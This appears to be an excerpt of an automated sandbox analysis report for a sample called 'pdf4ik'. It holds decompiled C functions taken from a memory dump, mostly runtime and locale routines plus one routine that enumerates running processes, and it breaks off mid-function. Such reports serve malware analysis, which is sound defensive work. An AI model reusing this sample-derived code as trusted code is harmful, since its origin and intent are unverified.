                                        • Opcode ID: a0daef754a05afac21696d82342fd0498f5253a031540e57f7c7682ec1edbbaf
                                        • Instruction ID: 0eb3a11bc48345ba11723193a7c2e018e4a442d4fca89ccf1ff039c40c34ea82
                                        • Opcode Fuzzy Hash: a0daef754a05afac21696d82342fd0498f5253a031540e57f7c7682ec1edbbaf
                                        • Instruction Fuzzy Hash: C8110433409605BBCB152E74E924E0A3799AF652A0B60C42EF94ACF950DE388543B3B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E29D98930(intOrPtr _a4) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _t15;
                                        				void* _t23;
                                        				intOrPtr _t35;
                                        				signed int _t37;
                                        				void* _t38;
                                        				void* _t39;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC1B44);
                                        				_push( *[fs:0x0]);
                                        				_t15 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t15 ^ _t37);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t35 = _a4;
                                        				_v8 = 4;
                                        				E29DAD811(_t35);
                                        				_t4 = _t35 + 0x1c; // 0xcccccccc
                                        				_t19 =  *_t4;
                                        				_t39 = _t38 + 4;
                                        				if( *_t4 != 0) {
                                        					E29DADFA6(_t19);
                                        					_t39 = _t39 + 4;
                                        				}
                                        				 *((intOrPtr*)(_t35 + 0x1c)) = 0;
                                        				_t6 = _t35 + 0x14; // 0xccc35de5
                                        				_t20 =  *_t6;
                                        				if( *_t6 != 0) {
                                        					E29DADFA6(_t20);
                                        					_t39 = _t39 + 4;
                                        				}
                                        				 *((intOrPtr*)(_t35 + 0x14)) = 0;
                                        				_t8 = _t35 + 0xc; // 0x59000000
                                        				_t21 =  *_t8;
                                        				if( *_t8 != 0) {
                                        					E29DADFA6(_t21);
                                        					_t39 = _t39 + 4;
                                        				}
                                        				 *((intOrPtr*)(_t35 + 0xc)) = 0;
                                        				_t10 = _t35 + 4; // 0xf44d8b00
                                        				_t22 =  *_t10;
                                        				if( *_t10 != 0) {
                                        					E29DADFA6(_t22);
                                        				}
                                        				 *((intOrPtr*)(_t35 + 4)) = 0;
                                        				_v8 = 0xffffffff;
                                        				_t23 = E29DADA85(_t35);
                                        				 *[fs:0x0] = _v16;
                                        				return _t23;
                                        			}











                                        APIs
                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 29D9895F
                                          • Part of subcall function 29DAD811: _setlocale.LIBCMT ref: 29DAD823
                                        • _free.LIBCMT ref: 29D98971
                                          • Part of subcall function 29DADFA6: HeapFree.KERNEL32(00000000,00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFBC
                                          • Part of subcall function 29DADFA6: GetLastError.KERNEL32(00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFCE
                                        • _free.LIBCMT ref: 29D98984
                                        • _free.LIBCMT ref: 29D98997
                                        • _free.LIBCMT ref: 29D989AA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                        • String ID:
                                        • API String ID: 3515823920-0
                                        • Opcode ID: b186295af8a00476de76d94f7c2090fe568bc18a557c46718fda1e51deee29d0
                                        • Instruction ID: 4174f10eb5a8b904b65b103a0ac74cf0fcf49733395461b7eb035286342e9dac
                                        • Opcode Fuzzy Hash: b186295af8a00476de76d94f7c2090fe568bc18a557c46718fda1e51deee29d0
                                        • Instruction Fuzzy Hash: 7F1194F2900A40AFD710DF5DDC40A4BF7E9EF60B20F148A2ED515C3A40EA35E9159B62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E29DA5230(intOrPtr _a4) {
                                        				signed int _v12;
                                        				char _v276;
                                        				void* _v312;
                                        				intOrPtr _v316;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t11;
                                        				void* _t21;
                                        				intOrPtr _t23;
                                        				intOrPtr _t29;
                                        				void* _t30;
                                        				signed int _t31;
                                        				void* _t32;
                                        
                                        				_t11 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t11 ^ _t31;
                                        				_v316 = _a4;
                                        				_t23 = 0;
                                        				_v312 = 0x128;
                                        				_t30 = CreateToolhelp32Snapshot(2, 0);
                                        				if(Process32First(_t30,  &_v312) != 0) {
                                        					_t29 = Process32Next;
                                        					_t28 =  &_v312;
                                        					while(Process32Next(_t30,  &_v312) != 0) {
                                        						_t21 = E29DBD8D0(_t29, _t30,  &_v276, _v316);
                                        						_t32 = _t32 + 8;
                                        						if(_t21 == 0) {
                                        							_t23 = 1;
                                        						}
                                        						_t28 =  &_v312;
                                        					}
                                        				}
                                        				CloseHandle(_t30);
                                        				return E29DADF46(_t23, _t23, _v12 ^ _t31, _t28, _t29, _t30);
                                        			}

















                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 29DA525F
                                        • Process32First.KERNEL32(00000000,00000128), ref: 29DA526F
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA5287
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA52B4
                                        • CloseHandle.KERNEL32(00000000), ref: 29DA52BB
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2284531361-0
                                        • Opcode ID: 0caca68a368f91eade9498cee74b60238e125ca7751958d4b6f405222a7dea30
                                        • Instruction ID: 067923598f1600f92999175270ad480ceabc7e1cf07b348d138a6598e1725a65
                                        • Opcode Fuzzy Hash: 0caca68a368f91eade9498cee74b60238e125ca7751958d4b6f405222a7dea30
                                        • Instruction Fuzzy Hash: 1111CE72A02219ABDB10EB64DD44FEE7778EF85340F008199E904DB240EB35AB46DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E29DB5022(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t12;
                                        				void* _t28;
                                        				intOrPtr _t29;
                                        				void* _t30;
                                        				void* _t31;
                                        
                                        				_t31 = __eflags;
                                        				_t26 = __edi;
                                        				_t25 = __edx;
                                        				_t20 = __ebx;
                                        				_push(0xc);
                                        				_push(0x29dd1d50);
                                        				E29DB5A50(__ebx, __edi, __esi);
                                        				_t28 = E29DB524B(__ebx, __edx, _t31);
                                        				_t12 =  *0x29dd5b98; // 0xfffffffe
                                        				if(( *(_t28 + 0x70) & _t12) == 0) {
                                        					L6:
                                        					E29DB60C0(_t20, _t26, 0xc);
                                        					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                        					_t29 = _t28 + 0x6c;
                                        					 *((intOrPtr*)(_t30 - 0x1c)) = E29DB4FD5(_t29,  *0x29dd5de0);
                                        					 *(_t30 - 4) = 0xfffffffe;
                                        					E29DB508F();
                                        				} else {
                                        					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                        						goto L6;
                                        					} else {
                                        						_t29 =  *((intOrPtr*)(E29DB524B(_t20, __edx, _t33) + 0x6c));
                                        					}
                                        				}
                                        				_t34 = _t29;
                                        				if(_t29 == 0) {
                                        					_push(0x20);
                                        					E29DB3393(_t25, _t34);
                                        				}
                                        				return E29DB5A95(_t29);
                                        			}








                                        APIs
                                        • __getptd.LIBCMT ref: 29DB502E
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB5045
                                        • __amsg_exit.LIBCMT ref: 29DB5053
                                        • __lock.LIBCMT ref: 29DB5063
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 29DB5077
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 498d22dfc2aadf04494e2c0c5681072b71bfe865cd3d8b2342fd9dd45b0331b2
                                        • Instruction ID: a6da2eaabfc035dbd84cc5bba52e7a9b20d88b812d64415587b3b560bbeee6b2
                                        • Opcode Fuzzy Hash: 498d22dfc2aadf04494e2c0c5681072b71bfe865cd3d8b2342fd9dd45b0331b2
                                        • Instruction Fuzzy Hash: 18F0B433901710ABEB15ABB49566B0D33A06F12720F11910DE247BFDC1CF285543FAB5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E29DA70D0(char __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				signed int _v32;
                                        				char _v48;
                                        				intOrPtr _v56;
                                        				char _v76;
                                        				void* _v80;
                                        				char _v81;
                                        				char _v82;
                                        				intOrPtr _v88;
                                        				char _v92;
                                        				intOrPtr _v96;
                                        				short _v99;
                                        				char _v100;
                                        				intOrPtr _v104;
                                        				signed int _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr* _v116;
                                        				char _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				char _v132;
                                        				void* _v136;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t222;
                                        				signed int _t223;
                                        				intOrPtr* _t226;
                                        				signed int _t228;
                                        				intOrPtr _t232;
                                        				intOrPtr* _t233;
                                        				intOrPtr _t236;
                                        				char* _t237;
                                        				void* _t241;
                                        				signed int _t243;
                                        				void* _t244;
                                        				void* _t245;
                                        				intOrPtr* _t248;
                                        				intOrPtr* _t250;
                                        				intOrPtr* _t264;
                                        				intOrPtr* _t266;
                                        				intOrPtr* _t269;
                                        				intOrPtr* _t273;
                                        				intOrPtr* _t275;
                                        				intOrPtr* _t280;
                                        				intOrPtr* _t283;
                                        				intOrPtr* _t286;
                                        				intOrPtr* _t290;
                                        				intOrPtr* _t292;
                                        				char* _t293;
                                        				char* _t305;
                                        				intOrPtr _t307;
                                        				intOrPtr _t309;
                                        				signed int _t316;
                                        				intOrPtr* _t322;
                                        				intOrPtr _t326;
                                        				intOrPtr* _t336;
                                        				intOrPtr _t347;
                                        				intOrPtr _t348;
                                        				char* _t364;
                                        				char* _t391;
                                        				intOrPtr _t392;
                                        				intOrPtr _t396;
                                        				intOrPtr _t419;
                                        				intOrPtr* _t426;
                                        				intOrPtr _t427;
                                        				intOrPtr _t431;
                                        				intOrPtr _t444;
                                        				intOrPtr _t447;
                                        				void* _t448;
                                        				void* _t449;
                                        				intOrPtr _t450;
                                        				void* _t453;
                                        				signed int _t457;
                                        				signed int _t461;
                                        				signed int _t462;
                                        				void* _t463;
                                        				void* _t464;
                                        				void* _t466;
                                        				void* _t467;
                                        				void* _t468;
                                        				void* _t469;
                                        				void* _t471;
                                        				intOrPtr _t497;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC232B);
                                        				_push( *[fs:0x0]);
                                        				_t464 = _t463 - 0x7c;
                                        				_t222 =  *0x29dd5664; // 0xd9555f04
                                        				_t223 = _t222 ^ _t462;
                                        				_v20 = _t223;
                                        				_push(_t223);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t322 = _a12;
                                        				_v82 = __ecx;
                                        				_v104 = __edx;
                                        				_v112 = _a16;
                                        				_v124 = _a8;
                                        				_v80 = _t322;
                                        				_v96 = _a20;
                                        				_v88 = _a24;
                                        				_t226 = E29D98E50(_a8, _a24,  &_v136);
                                        				_v8 = 0;
                                        				_t426 = E29DA7E20(_t226);
                                        				_v8 = 0xffffffff;
                                        				_t228 = _v136;
                                        				_v116 = _t426;
                                        				if(_t228 != 0) {
                                        					_t457 = _t228;
                                        					_v108 = _t457;
                                        					E29DADA5D( &_v92, 0);
                                        					_t316 =  *(_t457 + 4);
                                        					if(_t316 != 0 && _t316 < 0xffffffff) {
                                        						 *(_t457 + 4) = _t316 - 1;
                                        					}
                                        					asm("sbb esi, esi");
                                        					E29DADA85( &_v92);
                                        					_t461 =  !( ~( *(_t457 + 4))) & _v108;
                                        					if(_t461 != 0) {
                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t461))))(1);
                                        					}
                                        				}
                                        				E29DA7CA0(_t426,  &_v76);
                                        				_v8 = 1;
                                        				_v81 =  *((intOrPtr*)( *((intOrPtr*)( *_t426 + 8))))();
                                        				_v28 = 0xf;
                                        				_v32 = 0;
                                        				_v48 = 0;
                                        				_v8 = 2;
                                        				_t232 =  *_t322;
                                        				if(_t232 == 0x2b) {
                                        					L8:
                                        					_v108 = 1;
                                        					goto L9;
                                        				} else {
                                        					_v108 = 0;
                                        					_t480 = _t232 - 0x2d;
                                        					if(_t232 != 0x2d) {
                                        						L9:
                                        						_t233 = E29DAFCBE(_t426, 1, _t480);
                                        						_t444 = _v88;
                                        						_v100 =  *((intOrPtr*)( *_t233));
                                        						_v99 = 0x65;
                                        						_v92 = E29DAEB70(_t322, 0x65, _t444);
                                        						_t236 = E29DAEB70(_t322, _v100, _t444);
                                        						_t427 = _t236;
                                        						_t466 = _t464 + 0x18;
                                        						_v128 = _t427;
                                        						if(_t427 == 0) {
                                        							_v96 = _t236;
                                        						}
                                        						_t347 = _v56;
                                        						_t391 = _v76;
                                        						_t237 = _t391;
                                        						if(_t347 < 0x10) {
                                        							_t237 =  &_v76;
                                        						}
                                        						if( *_t237 == 0x7f) {
                                        							L39:
                                        							_t392 = _v124;
                                        							_t348 =  *((intOrPtr*)(_t392 + 0x20));
                                        							_t241 = _v96 + _t444 + _v112 + _v104;
                                        							_t497 =  *((intOrPtr*)(_t392 + 0x24));
                                        							if(_t497 < 0 || _t497 <= 0 && _t348 == 0 || _t348 <= _t241) {
                                        								_v92 = 0;
                                        								_t428 = _v92;
                                        							} else {
                                        								_t428 = _t348 - _t241;
                                        								_v92 = _t348 - _t241;
                                        							}
                                        							_t243 =  *(_t392 + 0x14) & 0x000001c0;
                                        							if(_t243 != 0x40) {
                                        								if(_t243 == 0x100) {
                                        									__eflags = _v108;
                                        									if(_v108 > 0) {
                                        										_t290 = E29DA7960(1, _t322,  &_v132, _a28, _a32);
                                        										_t466 = _t466 + 0xc;
                                        										_a28 =  *_t290;
                                        										_t450 = _t444 - 1;
                                        										__eflags = _t450;
                                        										_a32 =  *((intOrPtr*)(_t290 + 4));
                                        										_v80 = _t322 + 1;
                                        										_v88 = _t450;
                                        									}
                                        									_t286 = E29DA79D0(_t428, _v82,  &_v132, _a28, _a32);
                                        									_a28 =  *_t286;
                                        									_a32 =  *((intOrPtr*)(_t286 + 4));
                                        								} else {
                                        									_t292 = E29DA79D0(_t428, _v82,  &_v132, _a28, _a32);
                                        									_a28 =  *_t292;
                                        									_a32 =  *((intOrPtr*)(_t292 + 4));
                                        								}
                                        								_t444 = _v88;
                                        								_t322 = _v80;
                                        								_v92 = 0;
                                        								_t466 = _t466 + 8;
                                        							}
                                        							_t244 = E29DAEB70(_t322, _v100, _t444);
                                        							_t467 = _t466 + 0xc;
                                        							if(_t244 != 0) {
                                        								_t127 = _t244 - _t322 + 1; // 0x1
                                        								_t449 = _t127;
                                        								_t130 = _t449 - 1; // 0x0
                                        								_t273 = E29DA7BD0(_v80, _v81,  &_v132, _t130, _a28, _a32);
                                        								_a28 =  *_t273;
                                        								_a32 =  *((intOrPtr*)(_t273 + 4));
                                        								_t275 = E29DA79D0(_v104, 0x30,  &_v132,  *_t273,  *((intOrPtr*)(_t273 + 4)));
                                        								_a28 =  *_t275;
                                        								_a32 =  *((intOrPtr*)(_t275 + 4));
                                        								_t280 = E29DA79D0(1,  *((intOrPtr*)( *((intOrPtr*)( *_v116 + 4))))(),  &_v120, _a28, _a32);
                                        								_a28 =  *_t280;
                                        								_a32 =  *((intOrPtr*)(_t280 + 4));
                                        								_t283 = E29DA79D0(_v112, 0x30,  &_v120,  *_t280,  *((intOrPtr*)(_t280 + 4)));
                                        								_v80 = _v80 + _t449;
                                        								_t322 = _v80;
                                        								_t467 = _t467 + 0x28;
                                        								_v88 = _v88 - _t449;
                                        								_t444 = _v88;
                                        								_a28 =  *_t283;
                                        								_a32 =  *((intOrPtr*)(_t283 + 4));
                                        							}
                                        							_t245 = E29DAEB70(_t322, 0x65, _t444);
                                        							_t468 = _t467 + 0xc;
                                        							if(_t245 != 0) {
                                        								_t163 = _t245 - _t322 + 1; // 0x1
                                        								_t448 = _t163;
                                        								_t165 = _t448 - 1; // 0x0
                                        								_t264 = E29DA7BD0(_v80, _v81,  &_v120, _t165, _a28, _a32);
                                        								_a28 =  *_t264;
                                        								_a32 =  *((intOrPtr*)(_t264 + 4));
                                        								_t266 = E29DA79D0(_v96, 0x30,  &_v120,  *_t264,  *((intOrPtr*)(_t264 + 4)));
                                        								_a28 =  *_t266;
                                        								_t471 = _t468 + 0x18;
                                        								_a32 =  *((intOrPtr*)(_t266 + 4));
                                        								_v96 = 0;
                                        								_t364 = "E";
                                        								if(( *(_v124 + 0x14) & 0x00000004) == 0) {
                                        									_t364 = "e";
                                        								}
                                        								_t269 = E29DA7960(1, _t364,  &_v120,  *_t266,  *((intOrPtr*)(_t266 + 4)));
                                        								_v80 = _v80 + _t448;
                                        								_t468 = _t471 + 0xc;
                                        								_v88 = _v88 - _t448;
                                        								_t444 = _v88;
                                        								_a28 =  *_t269;
                                        								_a32 =  *((intOrPtr*)(_t269 + 4));
                                        							}
                                        							_t248 = E29DA7BD0(_v80, _v81,  &_v120, _t444, _a28, _a32);
                                        							_a28 =  *_t248;
                                        							_a32 =  *((intOrPtr*)(_t248 + 4));
                                        							_t250 = E29DA79D0(_v96, 0x30,  &_v120,  *_t248,  *((intOrPtr*)(_t248 + 4)));
                                        							_t396 = _v124;
                                        							_t430 = _a4;
                                        							_a28 =  *_t250;
                                        							_a32 =  *((intOrPtr*)(_t250 + 4));
                                        							 *((intOrPtr*)(_t396 + 0x20)) = 0;
                                        							 *((intOrPtr*)(_t396 + 0x24)) = 0;
                                        							E29DA79D0(_v92, _v82, _a4,  *_t250,  *((intOrPtr*)(_t250 + 4)));
                                        							_t469 = _t468 + 0x20;
                                        							if(_v28 >= 0x10) {
                                        								_push(_v48);
                                        								E29DADF3B();
                                        								_t469 = _t469 + 4;
                                        							}
                                        							_v28 = 0xf;
                                        							_v32 = 0;
                                        							_v48 = 0;
                                        							if(_v56 >= 0x10) {
                                        								_push(_v76);
                                        								E29DADF3B();
                                        							}
                                        							 *[fs:0x0] = _v16;
                                        							_pop(_t431);
                                        							_pop(_t447);
                                        							_pop(_t326);
                                        							return E29DADF46(_t430, _t326, _v20 ^ _t462, _t396, _t431, _t447);
                                        						} else {
                                        							_t293 = _t391;
                                        							if(_t347 < 0x10) {
                                        								_t293 =  &_v76;
                                        							}
                                        							if( *_t293 <= 0) {
                                        								goto L39;
                                        							} else {
                                        								_t381 =  &_v48;
                                        								E29D95540(_t322,  &_v48, _t444);
                                        								if(_v92 != 0) {
                                        									__eflags = _t427;
                                        									if(_t427 == 0) {
                                        										E29D957D0(_v104,  &_v48,  &_v48, 0x30);
                                        										_t322 = _v80;
                                        										_v104 = _t427;
                                        									}
                                        									_t381 = _v96;
                                        									__eflags = _v92 - _t322;
                                        									E29DA6F10(_v92 - _t322, _t391,  &_v48, _v96, 0x30);
                                        									_t427 = _v128;
                                        								} else {
                                        									E29D957D0(_v96,  &_v48,  &_v48, 0x30);
                                        									_t322 = _v80;
                                        								}
                                        								_push(0x30);
                                        								if(_t427 != 0) {
                                        									__eflags = _t427 - _t322;
                                        									_push(_v112);
                                        									E29DA6F10(_t427 - _t322 + 1, _v112,  &_v48);
                                        									E29DA6F10(_t427 - _t322, _v112,  &_v48, _v104, 0x30);
                                        									_v112 = 0;
                                        								} else {
                                        									E29D957D0(_v104, _t381,  &_v48);
                                        								}
                                        								_t336 = _v76;
                                        								_v104 = 0;
                                        								if(_v56 < 0x10) {
                                        									_t336 =  &_v76;
                                        								}
                                        								_t305 = _v48;
                                        								if(_v28 < 0x10) {
                                        									_t305 =  &_v48;
                                        								}
                                        								_t453 = E29DAFD20( &_v100, _t305,  &_v100);
                                        								_t307 =  *_t336;
                                        								_t466 = _t466 + 8;
                                        								if(_t307 == 0x7f) {
                                        									L35:
                                        									if(_v28 < 0x10) {
                                        										_v80 =  &_v48;
                                        									} else {
                                        										_v80 = _v48;
                                        									}
                                        									_t419 = _v32;
                                        									_t322 = _v80;
                                        									_v96 = 0;
                                        									_v88 = _t419;
                                        									_t444 = _t419;
                                        									goto L39;
                                        								} else {
                                        									while(_t307 > 0) {
                                        										_t421 = _t453 - _v108;
                                        										_t309 = _t307;
                                        										if(_t309 >= _t453 - _v108) {
                                        											goto L35;
                                        										}
                                        										_t453 = _t453 - _t309;
                                        										E29DA6F10(_t453, _t421,  &_v48, 1, 0);
                                        										if( *((char*)(_t336 + 1)) > 0) {
                                        											_t336 = _t336 + 1;
                                        										}
                                        										_t307 =  *_t336;
                                        										if(_t307 != 0x7f) {
                                        											continue;
                                        										} else {
                                        											goto L35;
                                        										}
                                        									}
                                        									goto L35;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					goto L8;
                                        				}
                                        			}

                                        APIs
                                          • Part of subcall function 29D98E50: std::_Lockit::_Lockit.LIBCPMT ref: 29D98E61
                                          • Part of subcall function 29DA7E20: std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E4C
                                          • Part of subcall function 29DA7E20: std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E6F
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7158
                                        • _localeconv.LIBCMT ref: 29DA71CE
                                        • _strcspn.LIBCMT ref: 29DA72EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$_localeconv_strcspn
                                        • String ID: e
                                        • API String ID: 331173946-4024072794
                                        • Opcode ID: adf4c58145c74c9bae12a399939530d53cf5d135aae27d43a113d54494a9f36e
                                        • Instruction ID: 363553ebab2c92e0edca16894593c34ca3221adcc08fe9cca27fbedd2cdf99e3
                                        • Opcode Fuzzy Hash: adf4c58145c74c9bae12a399939530d53cf5d135aae27d43a113d54494a9f36e
                                        • Instruction Fuzzy Hash: 33123875E002489FCB04CFA8C890ADEBBF5BF98300F15825DE959AB751D734AD06DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: swprintf
                                        • String ID: $$%$+
                                        • API String ID: 233258989-3202472541
                                        • Opcode ID: a18c391c237bbdfecffd1b11dee19a7451ff428f23fad18fbce60c9c34a787a4
                                        • Instruction ID: fbce258a4558cd3f4ccbfd13a67b32f6247d527864bac81a237329e8114bf22f
                                        • Opcode Fuzzy Hash: a18c391c237bbdfecffd1b11dee19a7451ff428f23fad18fbce60c9c34a787a4
                                        • Instruction Fuzzy Hash: 8F51AB77A09700EBC7059E18C9807CB7BE8EB81740F909D4DF9C0937D2E639896697D2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 15%
                                        			E29DA6C70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, signed long long _a24) {
                                        				signed int _v8;
                                        				long _v124;
                                        				char _v130;
                                        				char _v131;
                                        				long _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				char _v145;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t56;
                                        				signed int _t59;
                                        				signed char _t62;
                                        				short* _t63;
                                        				char _t71;
                                        				intOrPtr _t72;
                                        				intOrPtr _t73;
                                        				signed int _t74;
                                        				char _t76;
                                        				signed int _t84;
                                        				signed int _t85;
                                        				void* _t90;
                                        				intOrPtr _t91;
                                        				intOrPtr _t93;
                                        				void* _t94;
                                        				intOrPtr _t96;
                                        				signed int _t97;
                                        				signed int _t99;
                                        				signed int _t103;
                                        				signed int _t107;
                                        				signed int _t113;
                                        				signed int _t117;
                                        				signed long long _t125;
                                        
                                        				_t99 = (_t97 & 0xffffffc0) - 0xb4;
                                        				_t56 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t56 ^ _t99;
                                        				_t73 = _a16;
                                        				_v136 = _a4;
                                        				_t59 =  *(_t73 + 0x1c);
                                        				_t93 =  *((intOrPtr*)(_t73 + 0x18));
                                        				_v140 = _t73;
                                        				_t103 = _t59;
                                        				if(_t103 <= 0 && (_t103 < 0 || _t93 == 0) && ( *(_t73 + 0x14) & 0x00002000) == 0) {
                                        					_t93 = 6;
                                        					_t59 = 0;
                                        				}
                                        				_t74 = _t59;
                                        				_t107 = _t74;
                                        				if(_t107 < 0 || _t107 <= 0 && _t93 <= 0x24) {
                                        					_v144 = _t93;
                                        				} else {
                                        					_v144 = 0x24;
                                        				}
                                        				asm("cdq");
                                        				_t94 = _t93 - _v144;
                                        				asm("sbb ecx, edx");
                                        				_t84 =  *(_v140 + 0x14);
                                        				_t62 = _t84 & 0x00003000;
                                        				_t71 = 0;
                                        				_t90 = 0;
                                        				if(_t62 != 0x2000) {
                                        					_t125 = _a24;
                                        					goto L36;
                                        				} else {
                                        					asm("fldz");
                                        					asm("fcom st0, st1");
                                        					asm("fnstsw ax");
                                        					if((_t62 & 0x00000005) != 0) {
                                        						_v145 = 0;
                                        					} else {
                                        						_v145 = 1;
                                        						asm("fchs");
                                        					}
                                        					asm("fcom st0, st1");
                                        					asm("fnstsw ax");
                                        					_t125 =  *0x29dd0b30;
                                        					if((_t62 & 0x00000041) != 0) {
                                        						while(1) {
                                        							__eflags = _t71 - 0x1388;
                                        							if(__eflags >= 0) {
                                        								goto L14;
                                        							}
                                        							_t125 = _t125 / st0;
                                        							_t71 = _t71 + 0xa;
                                        							asm("fxch st0, st1");
                                        							asm("fcom st0, st2");
                                        							asm("fnstsw ax");
                                        							__eflags = _t62 & 0x00000041;
                                        							if(__eflags != 0) {
                                        								asm("fxch st0, st1");
                                        								continue;
                                        							}
                                        							st0 = _t125;
                                        							goto L20;
                                        						}
                                        						goto L14;
                                        					} else {
                                        						L14:
                                        						st1 = _t125;
                                        						L20:
                                        						asm("fxch st0, st2");
                                        						asm("fcomp st0, st1");
                                        						asm("fnstsw ax");
                                        						if((_t62 & 0x00000005) != 0) {
                                        							L32:
                                        							st1 = _t125;
                                        							if(_v145 != 0) {
                                        								asm("fchs");
                                        							}
                                        							L36:
                                        							_v132 = 0x25;
                                        							_t63 =  &_v131;
                                        							if((_t84 & 0x00000020) != 0) {
                                        								_v131 = 0x2b;
                                        								_t63 =  &_v130;
                                        							}
                                        							if((_t84 & 0x00000010) != 0) {
                                        								 *_t63 = 0x23;
                                        								_t63 = _t63 + 1;
                                        							}
                                        							_t85 = _t84 & 0x00003000;
                                        							 *_t63 = 0x2a2e;
                                        							 *((char*)(_t63 + 2)) = 0x4c;
                                        							_t123 = _t85 - 0x2000;
                                        							if(_t85 != 0x2000) {
                                        								__eflags = _t85 - 0x3000;
                                        								if(__eflags != 0) {
                                        									__eflags = _t85 - 0x1000;
                                        									_t41 = _t85 != 0x1000;
                                        									__eflags = _t41;
                                        									_t76 = (_t74 & 0xffffff00 | _t41) + (_t74 & 0xffffff00 | _t41) + 0x65;
                                        								} else {
                                        									_t76 = 0x61;
                                        								}
                                        							} else {
                                        								_t76 = 0x66;
                                        							}
                                        							 *((char*)(_t63 + 3)) = _t76;
                                        							 *(_t99 - 8) = _t125;
                                        							 *((char*)(_t63 + 4)) = 0;
                                        							_push(swprintf( &_v124, 0x6c,  &_v132, _v144, _a8, _a12));
                                        							_push(_t94);
                                        							_push(_t90);
                                        							_push( &_v124);
                                        							_push(_v140);
                                        							_push(_v136);
                                        							E29DA70D0(_a20, _t71, _t123);
                                        							_pop(_t91);
                                        							_pop(_t96);
                                        							_pop(_t72);
                                        							return E29DADF46(_v136, _t72, _v8 ^  &((_t99 - 8)[7]), _t71, _t91, _t96);
                                        						}
                                        						_t113 = _t74;
                                        						if(_t113 >= 0 && (_t113 > 0 || _t94 >= 0xa)) {
